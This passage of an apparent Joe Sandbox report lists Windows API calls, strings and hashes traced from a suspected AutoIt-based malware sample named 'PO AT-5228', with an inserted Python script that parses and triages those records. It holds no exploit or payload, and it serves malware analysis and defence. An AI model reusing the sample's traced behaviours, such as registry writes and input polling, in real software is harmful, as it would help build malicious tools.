                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI$mmmmmm
                                                                                        • API String ID: 1458621304-3582652670
                                                                                        • Opcode ID: ce9aa20a8dbb72bab05464607130b77d84babcb2e212a1e0987330762e5cde82
                                                                                        • Instruction ID: 387ff441f386b70ee65a97ba7308fd713d2a260b70b33c01fa6c72118714ddfe
                                                                                        • Opcode Fuzzy Hash: ce9aa20a8dbb72bab05464607130b77d84babcb2e212a1e0987330762e5cde82
                                                                                        • Instruction Fuzzy Hash: 1BB1BD71A0020A9FDB14DFA8CC85BAE7BF4FB58311F158269FA19AB2D0DB74D841CB51
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground
                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                        • API String ID: 62970417-1919597938
                                                                                        • Opcode ID: e307b4a2daf099a1851d8b9578f4c06348989499c5555b6dd4c9cc7314348c82
                                                                                        • Instruction ID: ef5161cc032e4b61d6fb0571400a451aa0db022a0acac79ce1868abd560eb7b7
                                                                                        • Opcode Fuzzy Hash: e307b4a2daf099a1851d8b9578f4c06348989499c5555b6dd4c9cc7314348c82
                                                                                        • Instruction Fuzzy Hash: 79D1DA30508682DFCB04EF24C4819AAFBF4FF64340F0049DAF45A57661EB74E9AADB91
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC3735
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BFDC00,00000000,?,00000000,?,?), ref: 00BC37A3
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BC37EB
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BC3874
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BC3B94
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BC3BA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: ea86cb4607f037f77128885dc7bcc99eb033041738789b2f426f18f6051ed54a
                                                                                        • Instruction ID: d450ac48b7c5932b826540929a3f87b84af6f4e77039eab7ad46f2df1793ec38
                                                                                        • Opcode Fuzzy Hash: ea86cb4607f037f77128885dc7bcc99eb033041738789b2f426f18f6051ed54a
                                                                                        • Instruction Fuzzy Hash: D5025A756046019FCB14EF24C895E2AB7E5FF89720F04849DF99A9B3A2CB34ED05CB85
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00BC6C56
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BC6D16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 3974292440-719923060
                                                                                        • Opcode ID: 5a8e20a9dd97b63a8615c76cf122625143403c23f3d999ec4812c8aafd89fa62
                                                                                        • Instruction ID: 9feebcec7b664157e2d0506c750446a799200cf646d26afc53286bb0bf3f5715
                                                                                        • Opcode Fuzzy Hash: 5a8e20a9dd97b63a8615c76cf122625143403c23f3d999ec4812c8aafd89fa62
                                                                                        • Instruction Fuzzy Hash: B9A14D742142419BCB14EF24C991F6AB3E9EF55314F1489EDB86A9B2D2DB30ED0ACB41
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B9CF91
                                                                                        • __swprintf.LIBCMT ref: 00B9D032
                                                                                        • _wcscmp.LIBCMT ref: 00B9D045
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00B9D09A
                                                                                        • _wcscmp.LIBCMT ref: 00B9D0D6
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00B9D10D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B9D15F
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B9D195
                                                                                        • GetParent.USER32(?), ref: 00B9D1B3
                                                                                        • ScreenToClient.USER32(00000000), ref: 00B9D1BA
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00B9D234
                                                                                        • _wcscmp.LIBCMT ref: 00B9D248
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00B9D26E
                                                                                        • _wcscmp.LIBCMT ref: 00B9D282
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3119225716-679674701
                                                                                        • Opcode ID: 1ee3dd89ebff4c039a9302e83ec7826503c75580a02d0617586da893af49b834
                                                                                        • Instruction ID: 2de0cd197ceea563627a670b126804e2588e645578b16fe6245fd4bf5c291a53
                                                                                        • Opcode Fuzzy Hash: 1ee3dd89ebff4c039a9302e83ec7826503c75580a02d0617586da893af49b834
                                                                                        • Instruction Fuzzy Hash: 6EA1E371604302AFDB14DF65C884FAAB7E8FF44350F008A69F999D7190DB30E946CBA1
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00B9D8EB
                                                                                        • _wcscmp.LIBCMT ref: 00B9D8FC
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B9D924
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00B9D941
                                                                                        • _wcscmp.LIBCMT ref: 00B9D95F
                                                                                        • _wcsstr.LIBCMT ref: 00B9D970
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00B9D9A8
                                                                                        • _wcscmp.LIBCMT ref: 00B9D9B8
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B9D9DF
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00B9DA28
                                                                                        • _wcscmp.LIBCMT ref: 00B9DA38
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00B9DA60
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00B9DAC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 06d19f0ac3e67c196065de278942d86c70067f7a08cd05bbf48b115cad685afd
                                                                                        • Instruction ID: 949a55e9de9627a5a2b579982e3add9af7581247e3cfcdb128f3227a64183422
                                                                                        • Opcode Fuzzy Hash: 06d19f0ac3e67c196065de278942d86c70067f7a08cd05bbf48b115cad685afd
                                                                                        • Instruction Fuzzy Hash: 71819D310083459FDF05DF25C885BAA7BE8EF84314F0484BAFD899A096DB74ED56CBA1
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                        • API String ID: 1038674560-1810252412
                                                                                        • Opcode ID: bd329ffc4b46c6da5243eb130c4a5d4c8bf5779729f885f95cf8c01855f80a8a
                                                                                        • Instruction ID: fe008cb71f5f0f8ddb85774febb2b687fcf2cf7b25184b30368411a9558c10a2
                                                                                        • Opcode Fuzzy Hash: bd329ffc4b46c6da5243eb130c4a5d4c8bf5779729f885f95cf8c01855f80a8a
                                                                                        • Instruction Fuzzy Hash: F231B035A48209EADF14FB51CD93EEDB3E49F22740F2001F9F542B10E2EB55AE54E651
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000063), ref: 00B9EAB0
                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B9EAC2
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B9EAD9
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00B9EAEE
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00B9EAF4
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B9EB04
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00B9EB0A
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B9EB2B
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B9EB45
                                                                                        • GetWindowRect.USER32(?,?), ref: 00B9EB4E
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00B9EBB9
                                                                                        • GetDesktopWindow.USER32 ref: 00B9EBBF
                                                                                        • GetWindowRect.USER32(00000000), ref: 00B9EBC6
                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B9EC12
                                                                                        • GetClientRect.USER32(?,?), ref: 00B9EC1F
                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B9EC44
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B9EC6F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                        • String ID:
                                                                                        • API String ID: 3869813825-0
                                                                                        • Opcode ID: 029e6a4c08982c73488a3dacc6199b055703c2889cc5a6d995fed99e3dba8cf4
                                                                                        • Instruction ID: 7925249f5720030db85784c86ac6e3db15c36a05a829d5a7241ded87772a224a
                                                                                        • Opcode Fuzzy Hash: 029e6a4c08982c73488a3dacc6199b055703c2889cc5a6d995fed99e3dba8cf4
                                                                                        • Instruction Fuzzy Hash: 87513C71900709AFDB20DFA8CD89B6EBBF5FF04705F004968E696A65A0DBB5E944CB10
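The function records above are easier to triage once the "API.MODULE(args), ref: ADDR" lines are parsed rather than read one by one. The following is an added example, not part of the Joe Sandbox report or of its IDA plugin: a small Python parser for that line format (including the indented "Part of subcall function" form and the no-argument form used for LIBCMT calls), with a histogram by module and a few triage checks that pull out the "AutoIt v3 GUI" window class, the RegSetValueExW value type, and the GetAsyncKeyState polling. The sample input is constructed from lines copied out of the records on this page. The REG_* type numbers and VK_LBUTTON/VK_RBUTTON values are Windows constants; the finding texts are this example's own wording.

```python
import re
from collections import Counter

# Constructed sample input: API lines copied verbatim from the function records
# in this report (Joe Sandbox IDA plugin listing for the PO AT-5228.exe image).
# Bullets and indentation are kept as they appear in the report.
SAMPLE_LINES = """\
• CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B7A9F9
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00B7AA52
  • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000001), ref: 00B7B691
  • Part of subcall function 00B7B63C: GetAsyncKeyState.USER32(00000002), ref: 00B7B69F
• SetTimer.USER32(00000000,00000000,00000028,00B7AB87), ref: 00B7AA79
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BC3735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00BFDC00,00000000,?,00000000,?,?), ref: 00BC37A3
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BC3874
• RegCloseKey.ADVAPI32(00000000), ref: 00BC3BA1
• __swprintf.LIBCMT ref: 00B9D032
• GetDesktopWindow.USER32 ref: 00B9EBBF
"""

# One report line: optional "Part of subcall function XXXX:" prefix, API.MODULE,
# an optional parenthesised argument list, then "ref: ADDR".
_API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# dwType values accepted by RegSetValueExW (Windows registry value types).
REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD",
             7: "REG_MULTI_SZ", 11: "REG_QWORD"}


def parse_api_lines(text):
    """Return one dict per API line; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = _API_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("mod").upper(),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return records


def arg_int(arg):
    """Hex argument -> int, or None for '?' and other non-numeric placeholders."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def module_histogram(records):
    """Count calls per module (USER32, ADVAPI32, LIBCMT, ...)."""
    return Counter(r["module"] for r in records)


def triage(records):
    """Return (finding, ref) pairs worth pulling out of the raw listing."""
    findings = []
    for r in records:
        api, args = r["api"], r["args"]
        if api == "CreateWindowExW" and len(args) > 1 and "AutoIt v3 GUI" in args[1]:
            findings.append(("window class 'AutoIt v3 GUI' (AutoIt runtime GUI)", r["ref"]))
        elif api == "RegSetValueExW" and len(args) > 3:
            t = arg_int(args[3])  # dwType is the fourth argument
            findings.append((f"registry write, dwType={REG_TYPES.get(t, t)}", r["ref"]))
        elif api == "GetAsyncKeyState" and args:
            # VK_LBUTTON = 0x01 and VK_RBUTTON = 0x02: this polls mouse buttons, not keys.
            vk = arg_int(args[0])
            which = {1: "VK_LBUTTON", 2: "VK_RBUTTON"}.get(vk, f"vk={vk}")
            findings.append((f"input polling via GetAsyncKeyState({which})", r["ref"]))
    return findings


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE_LINES)
    print(module_histogram(recs))
    for text, ref in triage(recs):
        print(f"{ref:08X}  {text}")
```

The argument values in these records come from the IDA plugin's static reconstruction ("?" marks what it could not resolve), so a decoded dwType or virtual-key code is a hint about the code path, not an observed runtime value; confirm it against the dynamic registry and API events elsewhere in the report before relying on it.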
                                                                                        APIs
                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00BB79C6
                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BB79D1
                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00BB79DC
                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00BB79E7
                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00BB79F2
                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00BB79FD
                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00BB7A08
                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00BB7A13
                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00BB7A1E
                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00BB7A29
                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00BB7A34
                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00BB7A3F
                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00BB7A4A
                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00BB7A55
                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00BB7A60
                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00BB7A6B
                                                                                        • GetCursorInfo.USER32(?), ref: 00BB7A7B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load$Info
                                                                                        • String ID:
                                                                                        • API String ID: 2577412497-0
                                                                                        • Opcode ID: 72e027c174fbd7719581d2b44fda156bf9ba1969c6ceda7b87023103e5e909c1
                                                                                        • Instruction ID: 735b667eb88e0705b5976afe64bdd04147d811cee8317130ab6873c71c34ce39
                                                                                        • Opcode Fuzzy Hash: 72e027c174fbd7719581d2b44fda156bf9ba1969c6ceda7b87023103e5e909c1
                                                                                        • Instruction Fuzzy Hash: 0331E9B1D483196BDB509FB68C899AFBFE8FF44750F504526E50DE7280DAB8A5008F91
                                                                                        APIs
                                                                                          • Part of subcall function 00B7E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B6C8B7,?,00002000,?,?,00000000,?,00B6419E,?,?,?,00BFDC00), ref: 00B7E984
                                                                                          • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                                                        • __wsplitpath.LIBCMT ref: 00B6C93E
                                                                                          • Part of subcall function 00B81DFC: __wsplitpath_helper.LIBCMT ref: 00B81E3C
                                                                                        • _wcscpy.LIBCMT ref: 00B6C953
                                                                                        • _wcscat.LIBCMT ref: 00B6C968
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00B6C978
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B6CABE
                                                                                          • Part of subcall function 00B6B337: _wcscpy.LIBCMT ref: 00B6B36F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 2258743419-1018226102
                                                                                        • Opcode ID: 4164c34010ab798dea44073412046a0dac7202d2501a29dc30e485e994b5ced7
                                                                                        • Instruction ID: 714d134dabbe63690bff2e3b373a15f05b30ad8f881c4eb37adde62693dc499d
                                                                                        • Opcode Fuzzy Hash: 4164c34010ab798dea44073412046a0dac7202d2501a29dc30e485e994b5ced7
                                                                                        • Instruction Fuzzy Hash: 7A129D315083419FC724EF24C881AAFBBE5EF99714F0449AEF58993262DB34DA49CB53
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BCCEFB
                                                                                        • DestroyWindow.USER32(?,?), ref: 00BCCF73
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00BCCFF4
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00BCD016
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BCD025
                                                                                        • DestroyWindow.USER32(?), ref: 00BCD042
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00B60000,00000000), ref: 00BCD075
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BCD094
                                                                                        • GetDesktopWindow.USER32 ref: 00BCD0A9
                                                                                        • GetWindowRect.USER32(00000000), ref: 00BCD0B0
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00BCD0C2
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00BCD0DA
                                                                                          • Part of subcall function 00B7B526: GetWindowLongW.USER32(?,000000EB), ref: 00B7B537
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 3877571568-3619404913
                                                                                        • Opcode ID: 9c3ad099b60427465e5dc0abe2dc00283703fe57fc084215192c2a92296126f8
                                                                                        • Instruction ID: 486e608e59be6e55ace5c577dc074c883712fe1d7468e0e8bfe788df7ef98867
                                                                                        • Opcode Fuzzy Hash: 9c3ad099b60427465e5dc0abe2dc00283703fe57fc084215192c2a92296126f8
                                                                                        • Instruction Fuzzy Hash: C971D0B4150345AFD720CF28CC95FAA77E5EB88704F08456EF9858B2A1DB74E946CB12
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00BCF37A
                                                                                          • Part of subcall function 00BCD7DE: ClientToScreen.USER32(?,?), ref: 00BCD807
                                                                                          • Part of subcall function 00BCD7DE: GetWindowRect.USER32(?,?), ref: 00BCD87D
                                                                                          • Part of subcall function 00BCD7DE: PtInRect.USER32(?,?,00BCED5A), ref: 00BCD88D
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00BCF3E3
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00BCF3EE
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00BCF411
                                                                                        • _wcscat.LIBCMT ref: 00BCF441
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00BCF458
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00BCF471
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00BCF488
